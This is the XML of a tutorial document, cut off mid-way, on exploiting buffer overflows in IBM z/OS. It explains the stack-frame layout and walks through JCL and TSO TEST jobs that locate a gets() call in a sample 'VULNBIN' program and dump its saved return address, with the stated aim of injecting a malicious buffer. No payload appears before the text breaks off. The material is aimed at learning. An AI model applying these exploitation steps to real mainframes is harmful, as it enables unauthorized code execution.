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Light" w:hAnsi="Calibri Light" w:eastAsia="Calibri Light" w:cs="Calibri Light" w:asciiTheme="majorAscii" w:cstheme="majorAscii" w:eastAsiaTheme="majorAscii" w:hAnsiTheme="majorAscii"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri Light" w:cs="Calibri Light" w:cstheme="majorAscii" w:eastAsiaTheme="majorAscii"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Buffer Overflows in z/OS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Terms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TSO:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Time Sharing Option – Interactive access to zOS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TSO TEST:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Debugger pre-installed on zOS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JCL:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Job Control Language – used to submit batch programs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RACF:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Access Control Facility – a tool used for access control management on z/OS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PSW:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Program Status Word – stores diagnostic information, including the address of the next instruction to attempt to process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>z/OS is IBM’s mainframe operating system which is designed to be backwards-compatible with old mainframe functionality that still sees common usage, while also making use of the developments in modern operating systems since then. For example tools like ISPF, Rexx and RACF are all supported and used within z/OS despite first being introduced in the late 1970s, while it also implements C/C++ APIs that can run new software.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Dynamic Storage Area</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">What are traditionally called “stack frames” in other operating systems are called </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Dynamic Storage Areas</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or DSAs) in z/OS, storing things like the data currently in registers 0 to F, and pointers to the next and previous DSAs on the stack. Its total size is 128 bytes, but we will focus on the first 80 bytes as these are the most important for buffer overflow attacks. Note that addresses are 4 bytes long (i.e. 32-bits) in the DSA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The first 80 bytes of a DSA:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3524250" cy="4200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524250" cy="4200525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A full breakdown of a DSA can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Note: There is no register 13 included in the DSA because register 13 points to the beginning of the current DSA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Buffer Overflow Exploit in Action</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As an example of a buffer overflow, we will look at a program that we shall call “VULNBIN” that is called from an executable that’s stored in a dataset at “PDS.APFLIB”:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JCL program to show the help dialog for VULNBIN:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto"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//VULNJOB  JOB 'VULNJOB',NOTIFY=BASC8,REGION=0M,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto"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MSGCLASS=H,MSGLEVEL=(1,1)                    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto"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//VULNJOB    EXEC PGM=VULNBIN                  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto"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//SYSIN     DD * </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto"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HELP                               </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto"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p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto"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//STEPLIB   DD DSN=PDS.APFLIB,DISP=SHR      </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto"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//SYSOUT DD SYSOUT=*                            </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto"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//SYSPRINT  DD  SYSOUT=*                        </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto"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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Output of the above program:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enter an argument:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Usage: VULNBIN &lt;arg 1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240"/>
        <w:ind w:firstLine="720"/>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VULNBIN HELP</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Static Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Below is a JCL program that will use the inbuilt AMBLIST program to map the modules and objects used by VULNBIN based on their position in memory.</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//AMBLIST JOB (ACCT),MSGCLASS=H,NOTIFY=BASC8</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//AMBL       EXEC   PGM=AMBLIST,REGION=64M</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//SYSPRINT   DD     DSN=LBASC8.BASCA8.AMBLIST(VULNBIN),DISP=OLD</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//AMBLIB     DD     DSN=PDS.APFLIB,DISP=SHR</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//SYSIN      DD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LISTLOAD  DDN=AMBLIB,MEMBER=VULNBIN,OUTPUT=MAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The resulting dataset contains many different modules and programs, but we are most interested with the gets() subroutine as seen below.</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LISTLOAD  DDN=AMBLIB,MEMBER=VULNBIN,OUTPUT=MAP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M O D U L E   S U M M A R Y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MEMBER NAME:  VULNBIN                MAIN ENTRY POINT:    00000100</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LIBRARY:      AMBLIB                 AMODE OF MAIN ENTRY POINT: 31</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ALIASES **      ENTRY POINT    AMODE</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NONE              00000100        31</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CLAS LOC   ELEM   LOC    LENGTH  TYPE  RMODE    ALIGNMENT     NAME</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100                       7C     ED      31    DOUBLE WORD  CEESTART</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2100                       A     ED      31    DOUBLE WORD  gets</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2100           0             LD                          GETS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows that VULNBIN makes a call to gets() at offset +0x2100 — this function has been known to be vulnerable to buffer overflow attacks, being deprecated in C99 and </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>removed from C11</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. To exploit this, we need to know when the function gets called so that we can inject our malicious buffer in the correct place — this is where some dynamic analysis can help us.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:strike w:val="false"/>
          <w:dstrike w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dynamic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TSO TEST can be used for such dynamic analysis, wherein by putting a breakpoint at offset +0x2100 of the program (i.e. when gets() is called) we can see the state of the caller’s DSA and dump the relevant registers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, if we can see the contents of the registers when gets() is called at runtime, we can determine if Address Space Layout Randomization (ASLR) is used to randomise the location of the executable in memory. If ASLR was turned on then the absolute addresses used would change each time and the following exploit would not work — luckily, </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>by default ASLR is disabled</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so this usually is not a concern to have.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JCL program to dump the DSA and other relevant data:</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/VULNTEST  JOB 'VULNTEST',NOTIFY=BASC8,REGION=0M,</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MSGCLASS=H,MSGLEVEL=(1,1)</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//STEP01    EXEC PGM=IKJEFT01</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//STEPLIB   DD DSN=SYS1.LINKLIB,DISP=SHR</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//SYSIN  DD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HELP</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//SYSTSPRT  DD  SYSOUT=A</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//SYSPRINT  DD  SYSOUT=*</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//SYSTSIN   DD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TEST 'PDS.APFLIB(VULNBIN)'</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AT +2100</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go</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LIST 1R? X</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LIST 13R</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LIST 13R? X M(20)</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="240"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Output of the above program:</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TEST 'PDS.APFLIB(VULNBIN)'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TEST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AT +2100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TEST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go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Enter an argument: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IKJ57024I AT +2100</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TEST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LIST 1R? X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1FABC2E0.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1FABC324</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; gets() ‘buffer’ is stored at 1FABC324</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TEST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LIST 13R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13R  1FABC248</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TEST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LIST 13R? X M(20)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1FABC248.  10000000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1FABC24C.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1FABC130</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; pointer to previous DSA</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1FABC250.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6ABA7040</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; pointer to next DSA</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1FABC254.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9FA8670E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> =&gt; return address (register 14)</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1FABC258.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1FA750C0</w:t>
      </w:r>
      <w:r>
